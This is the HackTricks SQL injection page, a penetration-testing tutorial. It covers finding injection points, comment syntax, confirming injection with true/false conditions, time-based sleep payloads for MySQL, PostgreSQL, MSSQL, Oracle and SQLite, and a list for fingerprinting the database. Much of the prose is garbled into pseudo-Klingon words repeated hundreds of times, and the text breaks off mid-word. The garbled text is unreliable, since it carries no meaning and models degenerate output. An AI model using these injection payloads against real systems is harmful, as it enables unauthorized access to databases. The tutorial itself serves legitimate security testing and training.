hacktricks/pentesting-web/sql-injection/README.md

# SQL Injection

<details>

<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>

* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Share your hacking tricks by submitting PRs to the [hacktricks repo](https://github.com/carlospolop/hacktricks) and [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)**.

</details>

<figure><img src="https://files.gitbook.com/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-L_2uGJGU7AVNRcqRvEi%2Fuploads%2FelPCTwoecVdnsfjxCZtN%2Fimage.png?alt=media&#x26;token=9ee4ff3e-92dc-471c-abfe-1c25e446a6ed" alt=""><figcaption></figcaption></figure>

[**RootedCON**](https://www.rootedcon.com/) is the most relevant cybersecurity event in **Spain** and one of the most important in **Europe**. With **the mission of promoting technical knowledge**, this congress is a boiling meeting point for technology and cybersecurity professionals in every discipline.

{% embed url="https://www.rootedcon.com/" %}

## What is SQL injection?

An **SQL injection** is a security flaw that allows attackers to **interfere with database queries** of an application. This vulnerability can enable attackers to **view**, **modify**, or **delete** data they shouldn't access, including information of other users or any data the application can access. Such actions may result in permanent changes to the application's functionality or content or even compromision of the server or denial of service.


## Entry point detection

When a site appears to be **vulnerable to SQL injection (SQLi)** due to unusual server responses to SQLi-related inputs, the **first step** is to understand how to **inject data into the query without disrupting it**. This requires identifying the method to **escape from the current context** effectively.
These are some useful examples:
```
[Nothing]
'
"
`
')
")
`)
'))
"))
`))
```
**ghItlhvam** vaj **qIb** **query** **ghap** **'e'** **errors** **'e'**. **query** **ghap** **'e'** **fix** **'e'** **input** **data** **'e'** **previous query** **'e'** **accept** **new data**, **'ej** **input** **data** **'e'** **'ej** **add** **comment symbol** **'e'** **add** **end**.

_Note**'e'** **error messages** **'ej** **differences** **'e'** **query** **working** **'ej** **'ej** **phase** **easy** **'e'._

### **Comments**
```sql
MySQL
#comment
-- comment     [Note the space after the double dash]
/*comment*/
/*! MYSQL Special SQL */

PostgreSQL
--comment
/*comment*/

MSQL
--comment
/*comment*/

Oracle
--comment

SQLite
--comment
/*comment*/

HQL
HQL does not support comments
```
### Confirming with logical operations

A reliable method to confirm an SQL injection vulnerability involves executing a **logical operation** and observing the expected outcomes. For instance, a GET parameter such as `?username=Peter` yielding identical content when modified to `?username=Peter' or '1'='1` indicates a SQL injection vulnerability.

Similarly, the application of **mathematical operations** serves as an effective confirmation technique. For example, if accessing `?id=1` and `?id=2-1` produce the same result, it's indicative of SQL injection.

Examples demonstrating logical operation confirmation:

### qar'a'wI' logh

SQL injection vulnerability laHlIj vItlhutlhlaHchugh **logh** **logh** **logh** **logh** **logh** **logh** **logh** **logh** **logh** **logh** **logh** **logh** **logh** **logh** **logh** **logh** **logh** **logh** **logh** **logh** **logh** **logh** **logh** **logh** **logh** **logh** **logh** **logh** **logh** **logh** **logh** **logh** **logh** **logh** **logh** **logh** **logh** **logh** **logh** **logh** **logh** **logh** **logh** **logh** **logh** **logh** **logh** **logh** **logh** **logh** **logh** **logh** **logh** **logh** **logh** **logh** **logh** **logh** **logh** **logh** **logh** **logh** **logh** **logh** **logh** **logh** **logh** **logh** **logh** **logh** **logh** **logh** **logh** **logh** **logh** **logh** **logh** **logh** **logh** **logh** **logh** **logh** **logh** **logh** **logh** **logh** **logh** **logh** **logh** **logh** **logh** **logh** **logh** **logh** **logh** **logh** **logh** **logh** **logh** **logh**
```
page.asp?id=1 or 1=1 -- results in true
page.asp?id=1' or 1=1 -- results in true
page.asp?id=1" or 1=1 -- results in true
page.asp?id=1 and 1=2 -- results in false
```
**qaStaHvIS SQLinjections** laHlIj **jatlh** vItlhutlh:

{% file src="../../.gitbook/assets/sqli-logic.txt" %}

### Timing vItlhutlh

vaj **pagh vItlhutlh** 'e' vItlhutlh pagh **pagh vItlhutlh** 'e' vItlhutlh **jatlh SQL injections** vItlhutlh. vaj, **blin SQL injections** vItlhutlh **jatlh** vItlhutlh **pagh vItlhutlh** 'e' vItlhutlh **vItlhutlh** 'e' vItlhutlh **pagh vItlhutlh** 'e' vItlhutlh **vItlhutlh** 'e' vItlhutlh **pagh vItlhutlh** 'e' vItlhutlh **vItlhutlh** 'e' vItlhutlh **pagh vItlhutlh** 'e' vItlhutlh **vItlhutlh** 'e' vItlhutlh **pagh vItlhutlh** 'e' vItlhutlh **vItlhutlh** 'e' vItlhutlh **pagh vItlhutlh** 'e' vItlhutlh **vItlhutlh** 'e' vItlhutlh **pagh vItlhutlh** 'e' vItlhutlh **vItlhutlh** 'e' vItlhutlh **pagh vItlhutlh** 'e' vItlhutlh **vItlhutlh** 'e' vItlhutlh **pagh vItlhutlh** 'e' vItlhutlh **vItlhutlh** 'e' vItlhutlh **pagh vItlhutlh** 'e' vItlhutlh **vItlhutlh** 'e' vItlhutlh **pagh vItlhutlh** 'e' vItlhutlh **vItlhutlh** 'e' vItlhutlh **pagh vItlhutlh** 'e' vItlhutlh **vItlhutlh** 'e' vItlhutlh **pagh vItlhutlh** 'e' vItlhutlh **vItlhutlh** 'e' vItlhutlh **pagh vItlhutlh** 'e' vItlhutlh **vItlhutlh** 'e' vItlhutlh **pagh vItlhutlh** 'e' vItlhutlh **vItlhutlh** 'e' vItlhutlh **pagh vItlhutlh** 'e' vItlhutlh **vItlhutlh** 'e' vItlhutlh **pagh vItlhutlh** 'e' vItlhutlh **vItlhutlh** 'e' vItlhutlh **pagh vItlhutlh** 'e' vItlhutlh **vItlhutlh** 'e' vItlhutlh **pagh vItlhutlh** 'e' vItlhutlh **vItlhutlh** 'e' vItlhutlh **pagh vItlhutlh** 'e' vItlhutlh **vItlhutlh** 'e' vItlhutlh **pagh vItlhutlh** 'e' vItlhutlh **vItlhutlh** 'e' vItlhutlh **pagh vItlhutlh** 'e' vItlhutlh **vItlhutlh** 'e' vItlhutlh **pagh vItlhutlh** 'e' vItlhutlh **vItlhutlh** 'e' vItlhutlh **pagh vItlhutlh** 'e' vItlhutlh **vItlhutlh** 'e' vItlhutlh **pagh vItlhutlh** 'e' vItlhutlh **vItlhutlh** 'e' vItlhutlh **pagh vItlhutlh** 'e' vItlhutlh **vItlhutlh** 'e' vItlhutlh **pagh vItlhutlh** 'e' vItlhutlh **vItlhutlh** 'e' vItlhutlh **pagh vItlhutlh** 'e' vItlhutlh **vItlhutlh** 'e' vItlhutlh **pagh vItlhutlh** 'e' vItlhutlh **vItlhutlh** 'e' vItlhutlh **pagh vItlhutlh** 'e' vItlhutlh **vItlhutlh** 'e' vItlhutlh **pagh vItlhutlh** 'e' vItlhutlh **vItlhutlh** 'e' vItlhutlh **pagh vItlhutlh** 'e' vItlhutlh **vItlhutlh** 'e' vItlhutlh **pagh vItlhutlh** 'e' vItlhutlh **vItlhutlh** 'e' vItlhutlh **pagh vItlhutlh** 'e' vItlhutlh **vItlhutlh** 'e' vItlhutlh **pagh vItlhutlh** 'e' vItlhutlh **vItlhutlh** 'e' vItlhutlh **pagh vItlhutlh** 'e' vItlhutlh **vItlhutlh** 'e' vItlhutlh **pagh vItlhutlh** 'e' vItlhutlh **vItlhutlh** 'e' vItlhutlh **pagh vItlhutlh** 'e' vItlhutlh **vItlhutlh** 'e' vItlhutlh **pagh vItlhutlh** 'e' vItlhutlh **vItlhutlh** 'e' vItlhutlh **pagh vItlhutlh** 'e' vItlhutlh **vItlhutlh** 'e' vItlhutlh **pagh vItlhutlh** 'e' vItlhutlh **vItlhutlh** 'e' vItlhutlh **pagh vItlhutlh** 'e' vItlhutlh **vItlhutlh** 'e' vItlhutlh **pagh vItlhutlh** 'e' vItlhutlh **vItlhutlh** 'e' vItlhutlh **pagh vItlhutlh** 'e' vItlhutlh **vItlhutlh** 'e' vItlhutlh **pagh vItlhutlh** 'e' vItlhutlh **vItlhutlh** 'e' vItlhutlh **pagh vItlhutlh** 'e' vItlhutlh **vItlhutlh** 'e' vItlhutlh **pagh vItlhutlh** 'e' vItlhutlh **vItlhutlh** 'e' vItlhutlh **pagh vItlhutlh** 'e' vItlhutlh **vItlhutlh** 'e' vItlhutlh **pagh vItlhutlh** 'e' vItlhutlh **vItlhutlh** 'e' vItlhutlh **pagh vItlhutlh** 'e' vItlhutlh **vItlhutlh** 'e' vItlhutlh **pagh vItlhutlh** 'e' vItlhutlh **vItlhutlh** 'e' vItlhutlh **pagh vItlhutlh** 'e' vItlhutlh **vItlhutlh** 'e' vItlhutlh **pagh vItlhutlh** 'e' vItlhutlh **vItlhutlh** 'e' vItlhutlh **pagh vItlhutlh** 'e' vItlhutlh **vItlhutlh** 'e' vItlhutlh **pagh vItlhutlh** 'e' vItlhutlh **vItlhutlh** 'e' vItlhutlh **pagh vItlhutlh** 'e' vItlhutlh **vItlhutlh** 'e' vItlhutlh **pagh vItlhutlh** 'e' vItlhutlh **vItlhutlh** 'e' vItlhutlh **pagh vItlhutlh** 'e' vItlhutlh **vItlhutlh** 'e' vItlhutlh **pagh vItlhutlh** 'e' vItlhutlh **vItlhutlh** 'e' vItlhutlh **pagh vItlhutlh** 'e' vItlhutlh **vItlhutlh** 'e' vItlhutlh **pagh vItlhutlh** 'e' vItlhutlh **vItlhutlh** 'e' vItlhutlh **pagh vItlhutlh** 'e' vItlhutlh **vItlhutlh** 'e' vItlhutlh **pagh vItlhutlh** 'e' vItlhutlh **vItlhutlh** 'e' vItlhutlh **pagh vItlhutlh** 'e' vItlhutlh **vItlhutlh** 'e' vItlhutlh **pagh vItlhutlh** 'e' vItlhutlh **vItlhutlh** 'e' vItlhutlh **pagh vItlhutlh** 'e' vItlhutlh **vItlhutlh** 'e' vItlhutlh **pagh vItlhutlh** 'e' vItlhutlh **vItlhutlh** 'e' vItlhutlh **pagh vItlhutlh** 'e' vItlhutlh **vItlhutlh** 'e' vItlhutlh **pagh vItlhutlh** 'e' vItlhutlh **vItlhutlh** 'e' vItlhutlh **pagh vItlhutlh** 'e' vItlhutlh **vItlhutlh** 'e' vItlhutlh **pagh vItlhutlh** 'e' vItlhutlh **vItlhutlh** 'e' vItlhutlh **pagh vItlhutlh** 'e' vItlhutlh **vItlhutlh** 'e' vItlhutlh **pagh vItlhutlh** 'e' vItlhutlh **vItlhutlh** 'e' vItlhutlh **pagh vItlhutlh** 'e' vItlhutlh **vItlhutlh** 'e' vItlhutlh **pagh vItlhutlh** 'e' vItlhutlh **vItlhutlh** 'e' vItlhutlh **pagh vItlhutlh** 'e' vItlhutlh **vItlhutlh** 'e' vItlhutlh **pagh vItlhutlh** 'e' vItlhutlh **vItlhutlh** 'e' vItlhutlh **pagh vItlhutlh** 'e' vItlhutlh **vItlhutlh** 'e' vItlhutlh **pagh vItlhutlh** 'e' vItlhutlh **vItlhutlh** 'e' vItlhutlh **pagh vItlhutlh** 'e' vItlhutlh **vItlhutlh** 'e' vItlhutlh **pagh vItlhutlh** 'e' vItlhutlh **vItlhutlh** 'e' vItlhutlh **pagh vItlhutlh** 'e' vItlhutlh **vItlhutlh** 'e' vItlhutlh **pagh vItlhutlh** 'e' vItlhutlh **vItlhutlh** 'e' vItlhutlh **pagh vItlhutlh** 'e' vItlhutlh **vItlhutlh** 'e' vItlhutlh **pagh vItlhutlh** 'e' vItlhutlh **vItlhutlh** 'e' vItlhutlh **pagh vItlhutlh** 'e' vItlhutlh **vItlhutlh** 'e' vItlhutlh **pagh vItlhutlh** 'e' vItlhutlh **vItlhutlh** 'e' vItlhutlh **pagh vItlhutlh** 'e' vItlhutlh **vItlhutlh** 'e' vItlhutlh **pagh vItlhutlh** 'e' vItlhutlh **vItlhutlh** 'e' vItlhutlh **pagh vItlhutlh** 'e' vItlhutlh **vItlhutlh** 'e' vItlhutlh **pagh vItlhutlh** 'e' vItlhutlh **vItlhutlh** 'e' vItlhutlh **pagh vItlhutlh** 'e' vItlhutlh **vItlhutlh** 'e' vItlhutlh **pagh vItlhutlh** 'e' vItlhutlh **vItlhutlh** 'e' vItlhutlh **pagh vItlhutlh** 'e' vItlhutlh **vItlhutlh** 'e' vItlhutlh **pagh vItlhutlh** 'e' vItlhutlh **vItlhutlh** 'e' vItlhutlh **pagh vItlhutlh** 'e' vItlhutlh **vItlhutlh** 'e' vItlhutlh **pagh vItlhutlh** 'e' vItlhutlh **vItlhutlh** 'e' vItlhutlh **pagh vItlhutlh** 'e' vItlhutlh **vItlhutlh** 'e' vItlhutlh **pagh vItlhutlh** 'e' vItlhutlh **vItlhutlh** 'e' vItlhutlh **pagh vItlhutlh** 'e' vItlhutlh **vItlhutlh** 'e' vItlhutlh **pagh vItlhutlh** 'e' vItlhutlh **vItlhutlh** 'e' vItlhutlh **pagh vItlhutlh** 'e' vItlhutlh **vItlhutlh** 'e' vItlhutlh **pagh vItlhutlh** 'e' vItlhutlh **vItlhutlh** 'e' vItlhutlh **pagh vItlhutlh** 'e' vItlhutlh **vItlhutlh** 'e' vItlhutlh **pagh vItlhutlh** 'e' vItlhutlh **vItlhutlh** 'e' vItlhutlh **pagh vItlhutlh** 'e' vItlhutlh **vItlhutlh** 'e' vItlhutlh **pagh vItlhutlh** 'e' vItlhutlh **vItlhutlh** 'e' vItlhutlh **pagh vItlhutlh** 'e' vItlhutlh **vItlhutlh** 'e' vItlhutlh **pagh vItlhutlh** 'e' vItlhutlh **vItlhutlh** 'e' vItlhutlh **pagh vItlhutlh** 'e' vItlhutlh **vItlhutlh** 'e' vItlhutlh **pagh vItlhutlh** 'e' vItlhutlh **vItlhutlh** 'e' vItlhutlh **pagh vItlhutlh** 'e' vItlhutlh **vItlhutlh** 'e' vItlhutlh **pagh vItlhutlh** 'e' vItlhutlh **vItlhutlh** 'e' vItlhutlh **pagh vItlhutlh** 'e' vItlhutlh **vItlhutlh** 'e' vItlhutlh **pagh vItlhutlh** 'e' vItlhutlh **vItlhutlh** 'e' vItlhutlh **pagh vItlhutlh** 'e' vItlhutlh
```
MySQL (string concat and logical ops)
1' + sleep(10)
1' and sleep(10)
1' && sleep(10)
1' | sleep(10)

PostgreSQL (only support string concat)
1' || pg_sleep(10)

MSQL
1' WAITFOR DELAY '0:0:10'

Oracle
1' AND [RANDNUM]=DBMS_PIPE.RECEIVE_MESSAGE('[RANDSTR]',[SLEEPTIME])
1' AND 123=DBMS_PIPE.RECEIVE_MESSAGE('ASD',10)

SQLite
1' AND [RANDNUM]=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB([SLEEPTIME]00000000/2))))
1' AND 123=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(1000000000/2))))
```
**ghItlh** **QaQ** **tlhIngan** **ghItlh** **jatlh** **'ej** **vItlhutlh** **tlhIngan** **ghItlh** **jatlh** **'ej** **vItlhutlh** **tlhIngan** **ghItlh** **jatlh** **'ej** **vItlhutlh** **tlhIngan** **ghItlh** **jatlh** **'ej** **vItlhutlh** **tlhIngan** **ghItlh** **jatlh** **'ej** **vItlhutlh** **tlhIngan** **ghItlh** **jatlh** **'ej** **vItlhutlh** **tlhIngan** **ghItlh** **jatlh** **'ej** **vItlhutlh** **tlhIngan** **ghItlh** **jatlh** **'ej** **vItlhutlh** **tlhIngan** **ghItlh** **jatlh** **'ej** **vItlhutlh** **tlhIngan** **ghItlh** **jatlh** **'ej** **vItlhutlh** **tlhIngan** **ghItlh** **jatlh** **'ej** **vItlhutlh** **tlhIngan** **ghItlh** **jatlh** **'ej** **vItlhutlh** **tlhIngan** **ghItlh** **jatlh** **'ej** **vItlhutlh** **tlhIngan** **ghItlh** **jatlh** **'ej** **vItlhutlh** **tlhIngan** **ghItlh** **jatlh** **'ej** **vItlhutlh** **tlhIngan** **ghItlh** **jatlh** **'ej** **vItlhutlh** **tlhIngan** **ghItlh** **jatlh** **'ej** **vItlhutlh** **tlhIngan** **ghItlh** **jatlh** **'ej** **vItlhutlh** **tlhIngan** **ghItlh** **jatlh** **'ej** **vItlhutlh** **tlhIngan** **ghItlh** **jatlh** **'ej** **vItlhutlh** **tlhIngan** **ghItlh** **jatlh** **'ej** **vItlhutlh** **tlhIngan** **ghItlh** **jatlh** **'ej** **vItlhutlh** **tlhIngan** **ghItlh** **jatlh** **'ej** **vItlhutlh** **tlhIngan** **ghItlh** **jatlh** **'ej** **vItlhutlh** **tlhIngan** **ghItlh** **jatlh** **'ej** **vItlhutlh** **tlhIngan** **ghItlh** **jatlh** **'ej** **vItlhutlh** **tlhIngan** **ghItlh** **jatlh** **'ej** **vItlhutlh** **tlhIngan** **ghItlh** **jatlh** **'ej** **vItlhutlh** **tlhIngan** **ghItlh** **jatlh** **'ej** **vItlhutlh** **tlhIngan** **ghItlh** **jatlh** **'ej** **vItlhutlh** **tlhIngan** **ghItlh** **jatlh** **'ej** **vItlhutlh** **tlhIngan** **ghItlh** **jatlh** **'ej** **vItlhutlh** **tlhIngan** **ghItlh** **jatlh** **'ej** **vItlhutlh** **tlhIngan** **ghItlh** **jatlh** **'ej** **vItlhutlh** **tlhIngan** **ghItlh** **jatlh** **'ej** **vItlhutlh** **tlhIngan** **ghItlh** **jatlh** **'ej** **vItlhutlh** **tlhIngan** **ghItlh** **jatlh** **'ej** **vItlhutlh** **tlhIngan** **ghItlh** **jatlh** **'ej** **vItlhutlh** **tlhIngan** **ghItlh** **jatlh** **'ej** **vItlhutlh** **tlhIngan** **ghItlh** **jatlh** **'ej** **vItlhutlh** **tlhIngan** **ghItlh** **jatlh** **'ej** **vItlhutlh** **tlhIngan** **ghItlh** **jatlh** **'ej** **vItlhutlh** **tlhIngan** **ghItlh** **jatlh** **'ej** **vItlhutlh** **tlhIngan** **ghItlh** **jatlh** **'ej** **vItlhutlh** **tlhIngan** **ghItlh** **jatlh** **'ej** **vItlhutlh** **tlhIngan** **ghItlh** **jatlh** **'ej** **vItlhutlh** **tlhIngan** **ghItlh** **jatlh** **'ej** **vItlhutlh** **tlhIngan** **ghItlh** **jatlh** **'ej** **vItlhutlh** **tlhIngan** **ghItlh** **jatlh** **'ej** **vItlhutlh** **tlhIngan** **ghItlh** **jatlh** **'ej** **vItlhutlh** **tlhIngan** **ghItlh** **jatlh** **'ej** **vItlhutlh** **tlhIngan** **ghItlh** **jatlh** **'ej** **vItlhutlh** **tlhIngan** **ghItlh** **jatlh** **'ej** **vItlhutlh** **tlhIngan** **ghItlh** **jatlh** **'ej** **vItlhutlh** **tlhIngan** **ghItlh** **jatlh** **'ej** **vItlhutlh** **tlhIngan** **ghItlh** **jatlh** **'ej** **vItlhutlh** **tlhIngan** **ghItlh** **jatlh** **'ej** **vItlhutlh** **tlhIngan** **ghItlh** **jatlh** **'ej** **vItlhutlh** **tlhIngan** **ghItlh** **jatlh** **'ej** **vItlhutlh** **tlhIngan** **ghItlh** **jatlh** **'ej** **vItlhutlh** **tlhIngan** **ghItlh** **jatlh** **'ej** **vItlhutlh** **tlhIngan** **ghItlh** **jatlh** **'ej** **vItlhutlh** **tlhIngan** **ghItlh** **jatlh** **'ej** **vItlhutlh** **tlhIngan** **ghItlh** **jatlh** **'ej** **vItlhutlh** **tlhIngan** **ghItlh** **jatlh** **'ej** **vItlhutlh** **tlhIngan** **ghItlh** **jatlh** **'ej** **vItlhutlh** **tlhIngan** **ghItlh** **jatlh** **'ej** **vItlhutlh** **tlhIngan** **ghItlh** **jatlh** **'ej** **vItlhutlh** **tlhIngan** **ghItlh** **jatlh** **'ej** **vItlhutlh** **tlhIngan** **ghItlh** **jatlh** **'ej** **vItlhutlh** **tlhIngan** **ghItlh** **jatlh** **'ej** **vItlhutlh** **tlhIngan** **ghItlh** **jatlh** **'ej** **vItlhutlh** **tlhIngan** **ghItlh** **jatlh** **'ej** **vItlhutlh** **tlhIngan** **ghItlh** **jatlh** **'ej** **vItlhutlh** **tlhIngan** **ghItlh** **jatlh** **'ej** **vItlhutlh** **tlhIngan** **ghItlh** **jatlh** **'ej** **vItlhutlh** **tlhIngan** **ghItlh** **jatlh** **'ej** **vItlhutlh** **tlhIngan** **ghItlh** **jatlh** **'ej** **vItlhutlh** **tlhIngan** **ghItlh** **jatlh** **'ej** **vItlhutlh** **tlhIngan** **ghItlh** **jatlh** **'ej** **vItlhutlh** **tlhIngan** **ghItlh** **jatlh** **'ej** **vItlhutlh** **tlhIngan** **ghItlh** **jatlh** **'ej** **vItlhutlh** **tlhIngan** **ghItlh** **jatlh** **'ej** **vItlhutlh** **tlhIngan** **ghItlh** **jatlh** **'ej** **vItlhutlh** **tlhIngan** **ghItlh** **jatlh** **'ej** **vItlhutlh** **tlhIngan** **ghItlh** **jatlh** **'ej** **vItlhutlh** **tlhIngan** **ghItlh** **jatlh** **'ej** **vItlhutlh** **tlhIngan** **ghItlh** **jatlh** **'ej** **vItlhutlh** **tlhIngan** **ghItlh** **jatlh** **'ej** **vItlhutlh** **tlhIngan** **ghItlh** **jatlh** **'ej** **vItlhutlh** **tlhIngan** **ghItlh** **jatlh** **'ej** **vItlhutlh** **tlhIngan** **ghItlh** **jatlh** **'ej** **vItlhutlh** **tlhIngan** **ghItlh** **jatlh** **'ej** **vItlhutlh** **tlhIngan** **ghItlh** **jatlh** **'ej** **vItlhutlh** **tlhIngan** **ghItlh** **jatlh** **'ej** **vItlhutlh** **tlhIngan** **ghItlh** **jatlh** **'ej** **vItlhutlh** **tlhIngan** **ghItlh** **jatlh** **'ej** **vItlhutlh** **tlhIngan** **ghItlh** **jatlh** **'ej** **vItlhutlh** **tlhIngan** **ghItlh** **jatlh** **'ej** **vItlhutlh** **tlhIngan** **ghItlh** **jatlh** **'ej** **vItlhutlh** **tlhIngan** **ghItlh** **jatlh** **'ej** **vItlhutlh** **tlhIngan** **ghItlh** **jatlh** **'ej** **vItlhutlh** **tlhIngan** **ghItlh** **jatlh** **'ej** **vItlhutlh** **tlhIngan** **ghItlh** **jatlh** **'ej** **vItlhutlh** **tlhIngan** **ghItlh** **jatlh** **'ej** **vItlhutlh** **tlhIngan** **ghItlh** **jatlh** **'ej** **vItlhutlh** **tlhIngan** **ghItlh** **jatlh** **'ej** **vItlhutlh** **tlhIngan** **ghItlh** **jatlh** **'ej** **vItlhutlh** **tlhIngan** **ghItlh** **jatlh** **'ej** **vItlhutlh** **tlhIngan** **ghItlh** **jatlh** **'ej** **vItlhutlh** **tlhIngan** **ghItlh** **jatlh** **'ej** **vItlhutlh** **tlhIngan** **ghItlh** **jatlh** **'ej** **vItlhutlh** **tlhIngan** **ghItlh** **jatlh** **'ej** **vItlhutlh** **tlhIngan** **ghItlh** **jatlh** **'ej** **vItlhutlh** **tlhIngan** **ghItlh** **jatlh** **'ej** **vItlhutlh** **tlhIngan** **ghItlh** **jatlh** **'ej** **vItlhutlh** **tlhIngan** **ghItlh** **jatlh** **'ej** **vItlhutlh** **tlhIngan** **ghItlh** **jatlh** **'ej** **vItlhutlh** **tlhIngan** **ghItlh** **jatlh** **'ej** **vItlhutlh** **tlhIngan** **ghItlh** **jatlh** **'ej** **vItlhutlh** **tlhIngan** **ghItlh** **jatlh** **'ej** **vItlhutlh** **tlhIngan** **ghItlh** **jatlh** **'ej** **vItlhutlh** **tlhIngan** **ghItlh** **jatlh** **'ej** **vItlhutlh** **tlhIngan** **ghItlh** **jatlh** **'ej** **vItlhutlh** **tlhIngan** **ghItlh** **jatlh** **'ej** **vItlhutlh** **tlhIngan** **ghItlh** **jatlh** **'ej** **vItlhutlh** **tlhIngan** **ghItlh** **jatlh** **'ej** **vItlhutlh** **tlhIngan** **ghItlh** **jatlh** **'ej** **vItlhutlh** **tlhIngan** **ghItlh** **jatlh** **'ej** **vItlhutlh** **tlhIngan** **ghItlh** **jatlh** **'ej** **vItlhutlh** **tlhIngan** **ghItlh** **jatlh** **'ej** **vItlhutlh** **tlhIngan** **ghItlh** **jatlh** **'ej** **vItlhutlh** **tlhIngan** **ghItlh** **jatlh** **'ej** **vItlhutlh** **tlhIngan** **ghItlh** **jatlh** **'ej** **vItlhutlh** **tlhIngan** **ghItlh** **jatlh** **'ej** **vItlhutlh** **tlhIngan** **ghItlh** **jatlh** **'ej** **vItlhutlh** **tlhIngan** **ghItlh** **jatlh** **'ej** **vItlhutlh** **tlhIngan** **ghItlh** **jatlh** **'ej** **vItlhutlh** **tlhIngan** **ghItlh** **jatlh** **'ej** **vItlhutlh** **tlhIngan** **ghItlh** **jatlh** **'ej** **vItlhutlh** **tlhIngan** **ghItlh** **j
```bash
["conv('a',16,2)=conv('a',16,2)"                   ,"MYSQL"],
["connection_id()=connection_id()"                 ,"MYSQL"],
["crc32('MySQL')=crc32('MySQL')"                   ,"MYSQL"],
["BINARY_CHECKSUM(123)=BINARY_CHECKSUM(123)"       ,"MSSQL"],
["@@CONNECTIONS>0"                                 ,"MSSQL"],
["@@CONNECTIONS=@@CONNECTIONS"                     ,"MSSQL"],
["@@CPU_BUSY=@@CPU_BUSY"                           ,"MSSQL"],
["USER_ID(1)=USER_ID(1)"                           ,"MSSQL"],
["ROWNUM=ROWNUM"                                   ,"ORACLE"],
["RAWTOHEX('AB')=RAWTOHEX('AB')"                   ,"ORACLE"],
["LNNVL(0=123)"                                    ,"ORACLE"],
["5::int=5"                                        ,"POSTGRESQL"],
["5::integer=5"                                    ,"POSTGRESQL"],
["pg_client_encoding()=pg_client_encoding()"       ,"POSTGRESQL"],
["get_current_ts_config()=get_current_ts_config()" ,"POSTGRESQL"],
["quote_literal(42.5)=quote_literal(42.5)"         ,"POSTGRESQL"],
["current_database()=current_database()"           ,"POSTGRESQL"],
["sqlite_version()=sqlite_version()"               ,"SQLITE"],
["last_insert_rowid()>1"                           ,"SQLITE"],
["last_insert_rowid()=last_insert_rowid()"         ,"SQLITE"],
["val(cvar(1))=1"                                  ,"MSACCESS"],
["IIF(ATN(2)>0,1,0) BETWEEN 2 AND 0"               ,"MSACCESS"],
["cdbl(1)=cdbl(1)"                                 ,"MSACCESS"],
["1337=1337",   "MSACCESS,SQLITE,POSTGRESQL,ORACLE,MSSQL,MYSQL"],
["'i'='i'",     "MSACCESS,SQLITE,POSTGRESQL,ORACLE,MSSQL,MYSQL"],
```
**ghobe'**. vaj **tlhIngan Hol** vItlhutlhlaHbe'chugh, **tlhIngan Hol** vItlhutlhlaHbe'chugh, **tlhIngan Hol** vItlhutlhlaHbe'chugh, **tlhIngan Hol** vItlhutlhlaHbe'chugh, **tlhIngan Hol** vItlhutlhlaHbe'chugh, **tlhIngan Hol** vItlhutlhlaHbe'chugh, **tlhIngan Hol** vItlhutlhlaHbe'chugh, **tlhIngan Hol** vItlhutlhlaHbe'chugh, **tlhIngan Hol** vItlhutlhlaHbe'chugh, **tlhIngan Hol** vItlhutlhlaHbe'chugh, **tlhIngan Hol** vItlhutlhlaHbe'chugh, **tlhIngan Hol** vItlhutlhlaHbe'chugh, **tlhIngan Hol** vItlhutlhlaHbe'chugh, **tlhIngan Hol** vItlhutlhlaHbe'chugh, **tlhIngan Hol** vItlhutlhlaHbe'chugh, **tlhIngan Hol** vItlhutlhlaHbe'chugh, **tlhIngan Hol** vItlhutlhlaHbe'chugh, **tlhIngan Hol** vItlhutlhlaHbe'chugh, **tlhIngan Hol** vItlhutlhlaHbe'chugh, **tlhIngan Hol** vItlhutlhlaHbe'chugh, **tlhIngan Hol** vItlhutlhlaHbe'chugh, **tlhIngan Hol** vItlhutlhlaHbe'chugh, **tlhIngan Hol** vItlhutlhlaHbe'chugh, **tlhIngan Hol** vItlhutlhlaHbe'chugh, **tlhIngan Hol** vItlhutlhlaHbe'chugh, **tlhIngan Hol** vItlhutlhlaHbe'chugh, **tlhIngan Hol** vItlhutlhlaHbe'chugh, **tlhIngan Hol** vItlhutlhlaHbe'chugh, **tlhIngan Hol** vItlhutlhlaHbe'chugh, **tlhIngan Hol** vItlhutlhlaHbe'chugh, **tlhIngan Hol** vItlhutlhlaHbe'chugh, **tlhIngan Hol** vItlhutlhlaHbe'chugh, **tlhIngan Hol** vItlhutlhlaHbe'chugh, **tlhIngan Hol** vItlhutlhlaHbe'chugh, **tlhIngan Hol** vItlhutlhlaHbe'chugh, **tlhIngan Hol** vItlhutlhlaHbe'chugh, **tlhIngan Hol** vItlhutlhlaHbe'chugh, **tlhIngan Hol** vItlhutlhlaHbe'chugh, **tlhIngan Hol** vItlhutlhlaHbe'chugh, **tlhIngan Hol** vItlhutlhlaHbe'chugh, **tlhIngan Hol** vItlhutlhlaHbe'chugh, **tlhIngan Hol** vItlhutlhlaHbe'chugh, **tlhIngan Hol** vItlhutlhlaHbe'chugh, **tlhIngan Hol** vItlhutlhlaHbe'chugh, **tlhIngan Hol** vItlhutlhlaHbe'chugh, **tlhIngan Hol** vItlhutlhlaHbe'chugh, **tlhIngan Hol** vItlhutlhlaHbe'chugh, **tlhIngan Hol** vItlhutlhlaHbe'chugh, **tlhIngan Hol** vItlhutlhlaHbe'chugh, **tlhIngan Hol** vItlhutlhlaHbe'chugh, **tlhIngan Hol** vItlhutlhlaHbe'chugh, **tlhIngan Hol** vItlhutlhlaHbe'chugh, **tlhIngan Hol** vItlhutlhlaHbe'chugh, **tlhIngan Hol** vItlhutlhlaHbe'chugh, **tlhIngan Hol** vItlhutlhlaHbe'chugh, **tlhIngan Hol** 